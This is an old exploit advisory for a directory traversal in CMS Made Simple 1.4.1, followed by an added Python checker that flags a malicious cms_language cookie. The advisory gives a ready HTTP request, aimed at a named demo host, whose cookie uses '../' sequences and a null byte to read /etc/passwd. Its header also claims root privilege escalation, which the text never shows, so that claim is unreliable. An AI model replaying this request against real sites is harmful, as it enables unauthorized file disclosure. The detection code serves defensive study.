Type: Directory Traversal vulnerability (Unix tested) / Root privileges escalation
Vendor: CMS Made Simple
Software: CMS Made Simple 1.4.1 "Spring Garden" (and probably others ...)
Author: M4ck-h@cK
Date: 29.11.2008
Home: sweet home
Contact: no, thx :)

Exploit:

Demo: on http://demo.cmsmadesimple.fr/admin/

GET http://demo.cmsmadesimple.fr/admin/login.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: demo.cmsmadesimple.fr
Cookie: cms_language=../../../../../../../../etc/passwd%00.html;cms_admin_user_id=1
Connection: Close
Pragma: no-cache

It's possible to set the "cms_language" cookie value in order to view the /etc/passwd file.

# milw0rm.com [2008-11-29]
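
A defensive check for the request shown above, as an added example that is not part of the original advisory or of CMS Made Simple: it parses a Cookie header and reports a cms_language value that carries a null byte, path separators or parent-directory sequences. The locale pattern (values such as en_US) and all function names are assumptions.

```python
import re
from urllib.parse import unquote_to_bytes

# Assumption: legitimate values are locale codes such as "en_US" or "fr_FR".
LOCALE_RE = re.compile(r"[a-z]{2,3}(_[A-Z]{2})?")

def parse_cookie_header(header):
    """Split a raw Cookie header into a name -> raw value dict."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies

def fully_decode(value, max_rounds=5):
    """Percent-decode until stable so nested encoding cannot hide bytes."""
    data = value.encode("latin-1", "replace")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    return data

def check_language_cookie(header, name="cms_language"):
    """Return findings for the language cookie; an empty list means clean."""
    raw = parse_cookie_header(header).get(name)
    if raw is None:
        return []
    data = fully_decode(raw)
    findings = []
    if b"\x00" in data:
        findings.append("null byte")
    if b".." in data:
        findings.append("parent-directory sequence")
    if b"/" in data or b"\\" in data:
        findings.append("path separator")
    if not LOCALE_RE.fullmatch(data.decode("latin-1")):
        findings.append("not a locale code")
    return findings

SAMPLES = [
    # Cookie header taken from the request in this advisory
    "cms_language=../../../../../../../../etc/passwd%00.html;cms_admin_user_id=1",
    # Constructed benign header
    "cms_language=fr_FR; cms_admin_user_id=1",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(check_language_cookie(sample) or "ok", "<-", sample)
```

The same allowlist test, applied server-side before the cookie value is used to build a file path, rejects the request outright instead of only logging it.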
CMS Made Simple 1.4.1 Local File Inclusion Vulnerability